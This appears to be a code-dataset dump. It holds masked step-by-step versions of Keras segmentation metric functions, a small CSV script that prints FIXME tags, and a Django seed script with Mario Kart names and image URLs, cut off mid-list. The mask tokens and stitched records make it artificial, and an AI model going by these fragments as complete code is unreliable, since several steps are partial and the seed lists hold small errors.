y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
def true_neg(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pred_neg = 1 - y_pred_pos
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
tn = K.sum(y_neg * y_pred_neg)
tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)
return tn_ratio
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
|
normal
|
{
"blob_id": "18b10a68b2707b7bfeccbd31c5d15686453b3406",
"index": 6253,
"step-1": "<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-2": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\n<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-3": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-4": "import tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-5": "# Copyright (c) 2020 Hai Nguyen\n# \n# This software is released under the MIT License.\n# https://opensource.org/licenses/MIT\n\nimport tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2. * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth) \n return tp \n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('nodes_tags.csv', 'r') as f:
tags = csv.DictReader(f)
for row in tags:
if row['key'] == 'FIXME':
pp(row)
<|reserved_special_token_1|>
import csv
from pprint import pprint as pp
with open('nodes_tags.csv', 'r') as f:
tags = csv.DictReader(f)
for row in tags:
if row['key'] == 'FIXME':
pp(row)
|
flexible
|
{
"blob_id": "d0981d279f7090d5309aa564252dba731a34a66b",
"index": 1424,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('nodes_tags.csv', 'r') as f:\n tags = csv.DictReader(f)\n for row in tags:\n if row['key'] == 'FIXME':\n pp(row)\n",
"step-3": "import csv\nfrom pprint import pprint as pp\nwith open('nodes_tags.csv', 'r') as f:\n tags = csv.DictReader(f)\n for row in tags:\n if row['key'] == 'FIXME':\n pp(row)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')
<|reserved_special_token_0|>
django.setup()
<|reserved_special_token_0|>
for char in char_names:
index = x - y + 1
name = char_names[x]
if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:
y += 1
index = None
new_char = Character(name=char_names[x], image_url=char_urls[x], index=
index)
new_char.save()
x += 1
<|reserved_special_token_0|>
for tire in tire_names:
index = x + 1
new_tire = Tire(name=tire_names[x], image_url=tire_urls[x], index=index)
new_tire.save()
x += 1
<|reserved_special_token_0|>
for car in car_names:
index = x + 1
new_car = Vehicle(name=car_names[x], image_url=car_urls[x], index=index)
new_car.save()
x += 1
<|reserved_special_token_0|>
for glider in glider_names:
index = x + 1
new_glider = Glider(name=glider_names[x], image_url=glider_urls[x],
index=index)
new_glider.save()
x += 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')
<|reserved_special_token_0|>
django.setup()
<|reserved_special_token_0|>
char_names = ['Mario', 'Luigi', 'Peach', 'Daisy', 'Rosalina',
'Mario Tanooki', 'Peach cat', 'Yoshi', 'Yoshi (LBlue)', 'Yoshi (Black)',
'Yoshi (Rose)', 'Yoshi (Yellow)', 'Yoshi (White)', 'Yoshi (Blue)',
'Yoshi (Rose)', 'Yoshi (Orange)', 'Toad', 'Koopa', 'Shyguy',
'Shyguy (LB)', 'Shyguy (Black)', 'Shyguy (Rose)', 'Shyguy (Yellow)',
'Shyguy (White)', 'Shyguy (Blue)', 'Shyguy (Rose)', 'Shyguy (Orange)',
'Lakitu', 'Toadette', 'Boo', 'Baby Mario', 'Baby Luigi', 'Baby Peach',
'Baby Daisy', 'Baby Rosalina', 'Metal Mario', 'Golden Mario',
'Golden Peach', 'Wario', 'Waluigi', 'Donkey Kong', 'Bowser', 'Skelerex',
'Bowser Jr', 'Dry Bowser', 'Lemmy', 'Larry', 'Wendy', 'Ludwig', 'Iggy',
'Roy', 'Morton', 'Inkling (G)', 'Inkling (B)', 'Link (SSBU)',
'Link (BOTW)', 'Villager (B)', 'Villager(G)', 'Mary']
char_urls = [
'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr'
, 'https://freepngimg.com/thumb/categories/462.png',
'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr'
,
'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png'
,
'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png'
,
'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809'
, 'https://www.123-stickers.com/5731-6069-large/Array.jpg',
'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr'
,
'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr'
,
'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr'
,
'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png'
,
'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png'
,
'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr'
,
'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo'
,
'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png'
,
'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM'
,
'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ'
,
'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708'
,
'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649'
,
'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910'
,
'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014'
,
'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222'
,
'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png'
,
'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png'
,
'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117'
, 'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',
'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323'
,
'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405'
,
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8'
, 'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',
'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141'
,
'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr'
,
'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525'
,
'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr'
,
'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png'
,
'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png'
,
'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129'
,
'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png'
,
'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr'
,
'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr'
,
'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112'
,
'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405'
,
'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png'
,
'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png'
,
'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543'
,
'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en'
,
'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png'
,
'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr'
]
car_names = ['Standard Kart', 'Pipe Frame', 'Mach 8', 'Steel Driver',
'Cat Cruiser', 'Circuit Special', 'Tri-Speeder', 'Badwagon', 'Prancer',
'Biddybuggy', 'Landship', 'Sneeker', 'Sports Coupe', 'Gold Standard',
'GLA', 'W 25 Silver Arrow', '300 SL Roadster', 'Blue Falcon',
'Tanooki Kart', 'B Dasher', 'Streetle', 'P-Wing', 'Koopa Clown',
'Standard Bike', 'Comet', 'Sport Bike', 'The Duke', 'Flame Rider',
'Varmint', 'Mr. Scooty', 'Jet Bike', 'Yoshi Bike', 'Master Cycle',
'Master Cycle Zero', 'City Tripper', 'Standard ATV', 'Wild Wiggler',
'Teddy Buggy', 'Bone Rattler', 'Splat Buggy', 'Inkstriker']
car_urls = [
'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932'
,
'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956'
,
'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237'
,
'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350'
,
'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333'
,
'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656'
,
'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625'
,
'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333'
,
'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'
,
'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'
,
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545'
,
'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836'
,
'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005'
,
'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107'
,
'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052'
,
'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857'
,
'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819'
,
'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942'
,
'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951'
,
'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925'
,
'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928'
,
'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256'
,
'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734'
,
'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936'
,
'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601'
,
'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111'
,
'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122'
,
'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108'
,
'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814'
,
'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507'
]
tire_names = ['Standard', 'Monster', 'Roller', 'Slim', 'Slick', 'Metal',
'Button', 'Off-Road', 'Sponge', 'Wood', 'Cushion', 'Blue Standard',
'Hot Monster', 'Azure Roller', 'Crimson Slim', 'Cyber Slick',
'Retro Off-Road', 'Gold Tires', 'GLA Tires', 'Triforce Tires',
'Ancient Tyres', 'Leaf Tires']
tire_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545'
,
'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541'
,
'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536'
,
'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542'
,
